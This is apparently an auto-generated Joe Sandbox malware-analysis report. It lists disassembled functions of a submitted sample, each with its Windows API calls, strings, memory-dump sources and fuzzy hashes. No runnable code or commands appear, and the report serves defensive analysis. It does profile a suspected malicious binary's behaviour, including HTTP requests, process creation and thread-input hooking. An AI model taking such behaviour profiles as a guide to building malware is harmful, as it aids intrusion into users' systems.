GetFileType.KERNEL32(00000001), ref: 0042ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0042AE11

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: d05390f3cb44285053ee2febbd5e6b81c0c775ccd2da8302e06ee6537205509f
Instruction ID: 1e7d97e7c38c6da714d1d657cfbdde346f06c9dd53f7923aedc6dd297c817baf
Opcode Fuzzy Hash: d05390f3cb44285053ee2febbd5e6b81c0c775ccd2da8302e06ee6537205509f
Instruction Fuzzy Hash: 23810A70A013618FCB14CF68D94059EBBF0AF05324B65426FD8A6AB3D1C73C9813CB5A

Function 00444025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00444047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,004430A5,?,00000001), ref: 0044405B
GetWindowThreadProcessId.USER32(00000000), ref: 00444062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 00444071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00444083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 0044409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,004430A5,?,00000001), ref: 004440AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 004440F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,004430A5,?,00000001), ref: 00444113

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
Instruction ID: 6ecddd2d5d529813481c134c16481e56c21dc0cb4356134cfef7aefd52ab227f
Opcode Fuzzy Hash: e5d4fd48dc500434fe148b757332dce145f8f0d543d7b8699ee7a378b0749fbc
Instruction Fuzzy Hash: 1631A772900204AFEB10DF54DC49F6E77A9BB98312F10C02AF905E6390DB78DD408B5C

Function 0047DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0041B496
SetTextColor.GDI32(?,000000FF), ref: 0041B4A0
SetBkMode.GDI32(?,00000001), ref: 0041B4B5
GetStockObject.GDI32(00000005), ref: 0041B4BD
GetClientRect.USER32(?), ref: 0047DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 0047DD7A
GetWindowDC.USER32(?), ref: 0047DD86
GetPixel.GDI32(00000000,?,?), ref: 0047DD95
ReleaseDC.USER32(?,00000000), ref: 0047DDA7
GetSysColor.USER32(00000005), ref: 0047DDC5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: fabe246d5bbfa96cf1bc1d455082a373c5f4812818b979defc29e3a5256c1bdb
Instruction ID: bb5a1f818cef16f3b5f2f64cd2e1b3b2b772e21604eb4e54309f7223e2820978
Opcode Fuzzy Hash: fabe246d5bbfa96cf1bc1d455082a373c5f4812818b979defc29e3a5256c1bdb
Instruction Fuzzy Hash: 75113D31901205BFDB216FA4EC48BEE7B71EF05325F108A3AFA66A51E2DB350941DB19

Function 00403093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 004030DC
CoUninitialize.OLE32(?,00000000), ref: 00403181
UnregisterHotKey.USER32(?), ref: 004032A9
DestroyWindow.USER32(?), ref: 00475079
FreeLibrary.KERNEL32(?), ref: 004750F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00475125

Strings

close all, xrefs: 004030D7

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 7b7400051c2ada79cba5ba7ff8586f32f1852a9ca515f089c74618a919c30194
Instruction ID: 5a794c083a5269744521f991c5528a76a1dc2fb916643718be34c64ed1899f27
Opcode Fuzzy Hash: 7b7400051c2ada79cba5ba7ff8586f32f1852a9ca515f089c74618a919c30194
Instruction Fuzzy Hash: 19914E74601102DFC705EF15C895AA9F7A8FF05309F5481BEE50A6B2A2DF38AE56CF48

Function 0041CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0041CC15

Part of subcall function 0041CCCD: GetClientRect.USER32(?,?), ref: 0041CCF6
Part of subcall function 0041CCCD: GetWindowRect.USER32(?,?), ref: 0041CD37
Part of subcall function 0041CCCD: ScreenToClient.USER32(?,?), ref: 0041CD5F

GetDC.USER32 ref: 0047D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0047D14A
SelectObject.GDI32(00000000,00000000), ref: 0047D158
SelectObject.GDI32(00000000,00000000), ref: 0047D16D
ReleaseDC.USER32(?,00000000), ref: 0047D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0047D200

Strings

U, xrefs: 0047D0D5

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: a1c2d8b331fa4b7bb6e904f4e3bae0450808739646f069972dd56e74f4a1e8b2
Instruction ID: 9a6e06668591dea6332ce3a20a7db368b064226a46ae5558b1ec45aff3e26ff4
Opcode Fuzzy Hash: a1c2d8b331fa4b7bb6e904f4e3bae0450808739646f069972dd56e74f4a1e8b2
Instruction Fuzzy Hash: C1710630900205DFCF219F64CC81AEA3BB1FF48314F14866BED599A2A6D7399C82DF59

Function 004545C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004545FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0045466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00454682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0045468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004546BF
InternetCloseHandle.WININET(00000000), ref: 00454706

Part of subcall function 00455052: GetLastError.KERNEL32(?,?,004543CC,00000000,00000000,00000001), ref: 00455067

Strings

, xrefs: 004546B8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
Instruction ID: 06e4a2979523fa4a57f0d8e8717a317025dbf267735069217734f69923b342c5
Opcode Fuzzy Hash: a045060e8911059459431702f3733a8007696582b43d561265531298ad99e5da
Instruction Fuzzy Hash: FF4170B1501205BFEB019F50CC85FBF77ACEF49719F00402AFE059A186D77899899BA8

Function 0045B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0049DC00), ref: 0045B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0049DC00), ref: 0045B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0045B8C1
SysFreeString.OLEAUT32(?), ref: 0045B8EB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 4982fa3a0f05e41a5b350e1a50a919fd4e6bbf6e1a210c163b9f95837ca6325d
Instruction ID: 2a68371652a71209ab2e3705f17ac1a5083255551f6ec9de84d798a73dae6afb
Opcode Fuzzy Hash: 4982fa3a0f05e41a5b350e1a50a919fd4e6bbf6e1a210c163b9f95837ca6325d
Instruction Fuzzy Hash: F6F16F71A00209EFCF04EF94C884EAEB7B9FF48315F10855AF905AB251DB35AE46CB94

Function 004624D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004624F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00462688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004626AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004626EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0046270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0046286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004628A1
CloseHandle.KERNEL32(?), ref: 004628D0
CloseHandle.KERNEL32(?), ref: 00462947

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 675bb03dd881ec10f87567cf78142fd94200e65420925fc16cad194ef3292610
Instruction ID: 297d9b7ce7acee4b45dcf329f4ac40872c5cbc720c169c6e9c03bb5cd95c0242
Opcode Fuzzy Hash: 675bb03dd881ec10f87567cf78142fd94200e65420925fc16cad194ef3292610
Instruction Fuzzy Hash: 92D1B231604700EFCB14EF25C991A6EBBE1AF84314F14856EF8859B3A2DB78DC45CB5A

Function 0046B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0046B3F4

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: ab9fc08601ebb2c91194f8ccf8b03e13aa72e8646b51a6a5d94ddda0b10f235f
Instruction ID: 37315d118532037fd48edcb4b58127136346e69ed462c9549075cd98b53ef0c5
Opcode Fuzzy Hash: ab9fc08601ebb2c91194f8ccf8b03e13aa72e8646b51a6a5d94ddda0b10f235f
Instruction Fuzzy Hash: 44517431600204BBDF249F158C85B9E3B64EB05318F644517FA15D63E2EB79E9D08BDA

Function 0041A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0047DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0047DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0047DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0047DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0047DB95
DestroyCursor.USER32(00000000), ref: 0047DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0047DBBD
DestroyCursor.USER32(00000000), ref: 0047DBC8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: CursorDestroyExtractIconImageLoadMessageSend
String ID:
API String ID: 3992029641-0
Opcode ID: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
Instruction ID: fadf16feb8645e96a8cf497107f48763286d092d757fb9cbab283d3aeb1fb45e
Opcode Fuzzy Hash: 0cf6ee739ab52051da489bb8517c88828cd0cf7fce358cea2fa76b683adbfda0
Instruction Fuzzy Hash: 65519B30A01208EFDB20CF64CC81FEA37B4AF08354F10452AF95A962D0D7B8ED90CB59

Function 00447555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00445FA6,?), ref: 00446ED8

Part of subcall function 00446EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00445FA6,?), ref: 00446EF1

Part of subcall function 004472CB: GetFileAttributesW.KERNEL32(?,00446019), ref: 004472CC

lstrcmpiW.KERNEL32(?,?), ref: 004475CA
_wcscmp.LIBCMT ref: 004475E2
MoveFileW.KERNEL32(?,?), ref: 004475FB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
Instruction ID: 4fd7047bc00f5dce267b69f2963a5cde5898196708b614909851b39d2912f40e
Opcode Fuzzy Hash: d4c9a3347340ec2f6b292e15ccfd5db41bd16ad9e0c1aa6c8d3ee4a06672525c
Instruction Fuzzy Hash: 875153B2A092295BEF54EB55D8419DE73BCAF08314B4040EFF605E3141DB7897C5CB68

Function 0041EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON

Download Yara Rule

APIs

ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EAEB
ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0041EB32
ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DC86
ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0047DAD1,00000004,00000000,00000000), ref: 0047DCF2

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
Instruction ID: a205110f149b1f1218910d7447822024f539e8ea0fa6c020a507fcb349153875
Opcode Fuzzy Hash: e35abcf98b5afbda80e3227c5b88a53d0a40ca8882ce08670dafe92d1e5b9445
Instruction Fuzzy Hash: 3041E738A1D2409ED735D72A898DAEB7BA5AF41304F19481FE84B426A1D67C78C1D31E

Function 0043B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B26C
RtlAllocateHeap.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B273
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B288
GetCurrentProcess.KERNEL32(?,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B290
DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B293
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0043AEF1,00000B00,?,?), ref: 0043B2A3
GetCurrentProcess.KERNEL32(0043AEF1,00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AB
DuplicateHandle.KERNEL32(00000000,?,0043AEF1,00000B00,?,?), ref: 0043B2AE
CreateThread.KERNEL32(00000000,00000000,0043B2D4,00000000,00000000,00000000), ref: 0043B2C8

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocateCreateThread
String ID:
API String ID: 1422014791-0
Opcode ID: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
Instruction ID: 649c36ebd82fd2d6613cd65ed5493ae8568e909360800d4a56ebfdffb0ad5fa3
Opcode Fuzzy Hash: b09332795f41ada4f02e568152242dc9f8119ecf0a51e018e84ae856f03226e9
Instruction Fuzzy Hash: 6101BBB5641304BFE710ABA5EC4DF6B7BACEB88711F018825FA05DB1E1CA749C00CB65

Function 0045C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0045C876, 0045C887
Not an Object type, xrefs: 0045C49E

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
Instruction ID: 8ae32c326f13b34f968a3fd0732ad79f87ca9b0915bfb685f72443b58ed8f10e
Opcode Fuzzy Hash: e315d8b9a7ed296eecbc4226fe30bc1a590a1587bd0666714106e32b319d473d
Instruction Fuzzy Hash: 4CE1B471A0031AAFDF14DFA4C8C1AAE77B5EB48355F14402EED05A7382D778AD49CB98

Function 004516DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON

Download Yara Rule

APIs

Part of subcall function 0040936C: __swprintf.LIBCMT ref: 004093AB
Part of subcall function 0040936C: __itow.LIBCMT ref: 004093DF

Part of subcall function 0041C6F4: _wcscpy.LIBCMT ref: 0041C717

_wcstok.LIBCMT ref: 0045184E
_wcscpy.LIBCMT ref: 004518DD
_memset.LIBCMT ref: 00451910

Strings

X, xrefs: 00451948
p2Kl2K, xrefs: 00451920

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: _wcscpy$__itow__swprintf_memset_wcstok
String ID: X$p2Kl2K
API String ID: 774024439-158789027
Opcode ID: f42f1562b16398fe9e25e1ce0f0515651a4088d02624d537944d6aa577f343f7
Instruction ID: 5d701206c7572f194744bddddaa9641398cd276a84611de6d7f8691adec13a80
Opcode Fuzzy Hash: f42f1562b16398fe9e25e1ce0f0515651a4088d02624d537944d6aa577f343f7
Instruction Fuzzy Hash: BCC172715043409FC724EF65C981A5BB7E4BF85354F04496EF8899B2A2DB38ED09CB8A

Function 00469A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00469B19
SendMessageW.USER32(?,00001036,00000000,?), ref: 00469B2D
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00469B47
_wcscat.LIBCMT ref: 00469BA2
SendMessageW.USER32(?,00001057,00000000,?), ref: 00469BB9
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00469BE7

Strings

SysListView32, xrefs: 00469AEB

Memory Dump Source

Source File: 00000000.00000002.1655638769.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1655627677.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.000000000048D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655676296.00000000004AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655708564.00000000004BA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1655721731.00000000004C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZsRFRjkt9q.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
